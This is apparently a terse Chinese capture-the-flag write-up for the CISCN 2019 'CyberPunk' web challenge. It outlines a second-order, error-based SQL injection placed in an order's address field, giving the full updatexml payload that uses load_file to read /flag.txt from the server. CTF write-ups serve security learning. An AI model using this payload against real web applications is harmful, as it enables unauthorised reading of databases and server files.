[CISCN2019 华北赛区 Day1 Web5]CyberPunk

二次注入 报错注入
创建订单

修改订单地址
1’ where user_id=updatexml(1,concat(0x7e,(select substr(load_file(‘/flag.txt’),20,50)),0x7e),1)#
![}PD{4BFQTYAM73V4F`@Y8B.png
查询订单得到flag